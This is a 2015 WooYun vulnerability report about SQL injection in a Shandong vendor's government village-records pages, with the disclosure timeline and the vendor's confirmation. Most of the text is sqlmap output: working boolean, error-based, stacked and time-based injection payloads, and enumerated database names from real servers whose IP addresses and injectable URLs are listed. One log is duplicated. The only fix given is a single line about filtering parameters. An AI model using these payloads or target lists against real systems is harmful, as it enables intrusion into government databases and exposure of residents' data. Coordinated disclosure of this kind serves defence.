当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-089525

漏洞标题:某政府系统两处注入打包

相关厂商:山东农友软件

漏洞作者: 路人甲

提交时间:2015-01-05 15:50

修复时间:2015-04-05 15:52

公开时间:2015-04-05 15:52

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-01-05: 细节已通知厂商并且等待厂商处理中
2015-01-09: 厂商已经确认,细节仅向厂商公开
2015-01-12: 细节向第三方安全合作伙伴开放
2015-03-05: 细节向核心白帽子及相关领域专家公开
2015-03-15: 细节向普通白帽子公开
2015-03-25: 细节向实习白帽子公开
2015-04-05: 细节向公众公开

简要描述:

RT

详细说明:

山东农友软件公司官网:http://www.nongyou.com.cn/
所有参数:tname和 CountryName都存在注入的。
案例如下:
http://218.56.99.84:8003/newSymSum/VillagePersonal2.aspx?tname=太河镇&CountryName=东同古村
http://222.135.109.70:8200/newSymSum/VillagePersonal2.aspx?tname=泽库镇&CountryName=辛立庄村
http://123.134.189.60:8022/newSymSum/VillagePersonal2.aspx?tname=牛泉镇&CountryName=西泉河
http://222.135.76.147:8200/newSymSum/VillagePersonal2.aspx?tname=斥山办事处&CountryName=西苏家村
http://218.58.124.131:8003/newSymSum/VillagePersonal2.aspx?tname=中央商务片区&CountryName=魏家社区
http://218.56.40.229:8037/newSymSum/VillagePersonal2.aspx?tname=毕郭镇&CountryName=庙子夼村
1.测试注入点:http://218.56.40.229:8037/newSymSum/VillagePersonal2.aspx?tname=毕郭镇&CountryName=庙子夼村

1.png


sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: tname
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: tname=???' AND 3360=3360 AND 'AunX'='AunX&CountryName=????
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: tname=???' AND (SELECT 4079 FROM(SELECT COUNT(*),CONCAT(0x717565737
1,(SELECT (CASE WHEN (4079=4079) THEN 1 ELSE 0 END)),0x716f676a71,FLOOR(RAND(0)*
2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'MnDW'='MnDW&Count
ryName=????
    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries
    Payload: tname=???'; SELECT SLEEP(5)-- &CountryName=????
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: tname=???' AND SLEEP(5) AND 'nhiY'='nhiY&CountryName=????
---
[16:41:05] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: MySQL 5.0
[16:41:05] [INFO] fetching database names
[16:41:35] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is
 going to retry the request
[16:41:43] [INFO] the SQL query used returns 5503 entries
[16:41:43] [INFO] retrieved: information_schema
[16:41:45] [INFO] retrieved: commoa
[16:41:46] [INFO] retrieved: commoa100001
[16:41:46] [INFO] retrieved: commoa100002
[16:41:47] [INFO] retrieved: commoa100003
[16:41:47] [INFO] retrieved: commoa100004
[16:41:48] [INFO] retrieved: commoa100005
[16:41:48] [INFO] retrieved: commoa100006
[16:41:48] [INFO] retrieved: commoa100007
[16:41:49] [INFO] retrieved: commoa100008
[16:41:49] [INFO] retrieved: commoa100009
[16:41:49] [INFO] retrieved: commoa100010
[16:41:50] [INFO] retrieved: commoa100011
[16:41:50] [INFO] retrieved: commoa100012
[16:41:51] [INFO] retrieved: commoa100013
[16:41:51] [INFO] retrieved: commoa100014
[16:41:51] [INFO] retrieved: commoa100015
[16:41:52] [INFO] retrieved: commoa100016
[16:41:52] [INFO] retrieved: commoa100017
[16:41:52] [INFO] retrieved: commoa100018
[16:41:53] [INFO] retrieved: commoa100019
[16:41:53] [INFO] retrieved: commoa100020
[16:41:55] [INFO] retrieved: commoa100021
[16:41:56] [INFO] retrieved: commoa100022
[16:41:56] [INFO] retrieved: commoa100023
[16:41:57] [INFO] retrieved: commoa100024
[16:41:57] [INFO] retrieved: commoa100025
[16:41:57] [INFO] retrieved: commoa100026
[16:41:58] [INFO] retrieved: commoa100027
[16:41:58] [INFO] retrieved: commoa100028
[16:41:59] [INFO] retrieved: commoa100029
[16:41:59] [INFO] retrieved: commoa100030
[16:41:59] [INFO] retrieved: commoa100031
[16:42:00] [INFO] retrieved: commoa100032
[16:42:00] [INFO] retrieved: commoa100033
[16:42:00] [INFO] retrieved: commoa100034
[16:42:01] [INFO] retrieved: commoa100035
[16:42:01] [INFO] retrieved: commoa100036
[16:42:02] [INFO] retrieved: commoa100037
[16:42:02] [INFO] retrieved: commoa100038
[16:42:02] [INFO] retrieved: commoa100039
[16:42:03] [INFO] retrieved: commoa100040
[16:42:03] [INFO] retrieved: commoa100041
[16:42:04] [INFO] retrieved: commoa100042
[16:42:04] [INFO] retrieved: commoa100043
[16:42:04] [INFO] retrieved: commoa100044
[16:42:05] [INFO] retrieved: commoa100045
[16:42:05] [INFO] retrieved: commoa100046
[16:42:07] [INFO] retrieved: commoa100047
[16:42:08] [INFO] retrieved: commoa100048
[16:42:08] [INFO] retrieved: commoa100049
[16:42:08] [INFO] retrieved: commoa100050
[16:42:09] [INFO] retrieved: commoa100051
[16:42:09] [INFO] retrieved: commoa100052
[16:42:10] [INFO] retrieved: commoa100053
[16:42:10] [INFO] retrieved: commoa100054
[16:42:12] [WARNING] user aborted during enumeration. sqlmap will display partia
l output
available databases [56]:
[*] commoa
[*] commoa100001
[*] commoa100002
[*] commoa100003
[*] commoa100004
[*] commoa100005
[*] commoa100006
[*] commoa100007
[*] commoa100008
[*] commoa100009
[*] commoa100010
[*] commoa100011
[*] commoa100012
[*] commoa100013
[*] commoa100014
[*] commoa100015
[*] commoa100016
[*] commoa100017
[*] commoa100018
[*] commoa100019
[*] commoa100020
[*] commoa100021
[*] commoa100022
[*] commoa100023
[*] commoa100024
[*] commoa100025
[*] commoa100026
[*] commoa100027
[*] commoa100028
[*] commoa100029
[*] commoa100030
[*] commoa100031
[*] commoa100032
[*] commoa100033
[*] commoa100034
[*] commoa100035
[*] commoa100036
[*] commoa100037
[*] commoa100038
[*] commoa100039
[*] commoa100040
[*] commoa100041
[*] commoa100042
[*] commoa100043
[*] commoa100044
[*] commoa100045
[*] commoa100046
[*] commoa100047
[*] commoa100048
[*] commoa100049
[*] commoa100050
[*] commoa100051
[*] commoa100052
[*] commoa100053
[*] commoa100054
[*] information_schema


5000多表,没深入的跑了。
我就测试这一个。其他均可复现。
-------------------------------------------------------------------
第二处注入:
http://218.58.124.131:8003/newSymSum/VillagePersonal3.aspx?tname=先进装备制造产业片区&CountryName=郭家村
http://222.135.76.147:8200/newSymSum/VillagePersonal3.aspx?tname=港西镇&CountryName=山后鞠家村
http://60.217.72.17:7081/newSymSum/VillagePersonal3.aspx?tname=新市镇&CountryName=王大褂村
http://222.135.109.70:8200/newSymSum/VillagePersonal3.aspx?tname=龙山办事处&CountryName=西楼
http://218.56.40.229:8053/newSymSum/VillagePersonal3.aspx?tname=城港路街道&CountryName=三间房
http://221.2.149.47:8200/newSymSum/VillagePersonal3.aspx?tname=滕家镇&CountryName=曹家沟
1.测试注入点:http://218.58.124.131:8003/newSymSum/VillagePersonal3.aspx?tname=先进装备制造产业片区&CountryName=郭家村

2.png


sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: tname
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: tname=??????????' AND 7785=7785 AND 'FAej'='FAej&CountryName=???
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: tname=??????????' AND (SELECT 8399 FROM(SELECT COUNT(*),CONCAT(0x71
62797171,(SELECT (CASE WHEN (8399=8399) THEN 1 ELSE 0 END)),0x716f617271,FLOOR(R
AND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'Ovog'='Ovo
g&CountryName=???
    Type: stacked queries
    Title: MySQL < 5.0.12 stacked queries (heavy query)
    Payload: tname=??????????'; SELECT BENCHMARK(5000000,MD5(0x72546e68))-- &Cou
ntryName=???
    Type: AND/OR time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (heavy query)
    Payload: tname=??????????' AND 2926=BENCHMARK(5000000,MD5(0x71496377)) AND '
qbiT'='qbiT&CountryName=???
---
[16:47:55] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: MySQL 5.0
[16:47:55] [INFO] fetching database names
[16:47:55] [INFO] the SQL query used returns 17 entries
[16:47:55] [INFO] retrieved: information_schema
[16:47:55] [INFO] retrieved: cw_databasecomm0517
[16:47:55] [INFO] retrieved: cw_databasecomm22zbgaoxin
[16:47:55] [INFO] retrieved: cw_databasecommxh
[16:47:56] [INFO] retrieved: cw_databasezbgx
[16:47:56] [INFO] retrieved: cwdbcommzbgx100001
[16:47:56] [INFO] retrieved: cwdbcommzbgx100002
[16:47:56] [INFO] retrieved: cwdbcommzbgx100003
[16:47:56] [INFO] retrieved: cwdbcommzbgx100004
[16:47:56] [INFO] retrieved: cwdbcommzbgx100005
[16:47:56] [INFO] retrieved: cwdbcommzbgx100007
[16:47:56] [INFO] retrieved: mysql
[16:47:56] [INFO] retrieved: nl_zbgaoxin
[16:47:56] [INFO] retrieved: ny_landgxlz
[16:47:56] [INFO] retrieved: test
[16:47:56] [INFO] retrieved: village-levelmajor33zbgaoxin
[16:47:56] [INFO] retrieved: village-levelmajor33zbgaoxinqu
available databases [17]:
[*] cw_databasecomm0517
[*] cw_databasecomm22zbgaoxin
[*] cw_databasecommxh
[*] cw_databasezbgx
[*] cwdbcommzbgx100001
[*] cwdbcommzbgx100002
[*] cwdbcommzbgx100003
[*] cwdbcommzbgx100004
[*] cwdbcommzbgx100005
[*] cwdbcommzbgx100007
[*] information_schema
[*] mysql
[*] nl_zbgaoxin
[*] ny_landgxlz
[*] test
[*] village-levelmajor33zbgaoxin
[*] village-levelmajor33zbgaoxinqu


以上均可复现的。

漏洞证明:

2.png


sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: tname
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: tname=??????????' AND 7785=7785 AND 'FAej'='FAej&CountryName=???
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: tname=??????????' AND (SELECT 8399 FROM(SELECT COUNT(*),CONCAT(0x71
62797171,(SELECT (CASE WHEN (8399=8399) THEN 1 ELSE 0 END)),0x716f617271,FLOOR(R
AND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'Ovog'='Ovo
g&CountryName=???
    Type: stacked queries
    Title: MySQL < 5.0.12 stacked queries (heavy query)
    Payload: tname=??????????'; SELECT BENCHMARK(5000000,MD5(0x72546e68))-- &Cou
ntryName=???
    Type: AND/OR time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (heavy query)
    Payload: tname=??????????' AND 2926=BENCHMARK(5000000,MD5(0x71496377)) AND '
qbiT'='qbiT&CountryName=???
---
[16:47:55] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: MySQL 5.0
[16:47:55] [INFO] fetching database names
[16:47:55] [INFO] the SQL query used returns 17 entries
[16:47:55] [INFO] retrieved: information_schema
[16:47:55] [INFO] retrieved: cw_databasecomm0517
[16:47:55] [INFO] retrieved: cw_databasecomm22zbgaoxin
[16:47:55] [INFO] retrieved: cw_databasecommxh
[16:47:56] [INFO] retrieved: cw_databasezbgx
[16:47:56] [INFO] retrieved: cwdbcommzbgx100001
[16:47:56] [INFO] retrieved: cwdbcommzbgx100002
[16:47:56] [INFO] retrieved: cwdbcommzbgx100003
[16:47:56] [INFO] retrieved: cwdbcommzbgx100004
[16:47:56] [INFO] retrieved: cwdbcommzbgx100005
[16:47:56] [INFO] retrieved: cwdbcommzbgx100007
[16:47:56] [INFO] retrieved: mysql
[16:47:56] [INFO] retrieved: nl_zbgaoxin
[16:47:56] [INFO] retrieved: ny_landgxlz
[16:47:56] [INFO] retrieved: test
[16:47:56] [INFO] retrieved: village-levelmajor33zbgaoxin
[16:47:56] [INFO] retrieved: village-levelmajor33zbgaoxinqu
available databases [17]:
[*] cw_databasecomm0517
[*] cw_databasecomm22zbgaoxin
[*] cw_databasecommxh
[*] cw_databasezbgx
[*] cwdbcommzbgx100001
[*] cwdbcommzbgx100002
[*] cwdbcommzbgx100003
[*] cwdbcommzbgx100004
[*] cwdbcommzbgx100005
[*] cwdbcommzbgx100007
[*] information_schema
[*] mysql
[*] nl_zbgaoxin
[*] ny_landgxlz
[*] test
[*] village-levelmajor33zbgaoxin
[*] village-levelmajor33zbgaoxinqu

修复方案:

参数过滤

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-01-09 18:28

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给山东分中心,由其后续协调网站管理单位处置。

最新状态:

暂无

漏洞评价:

评论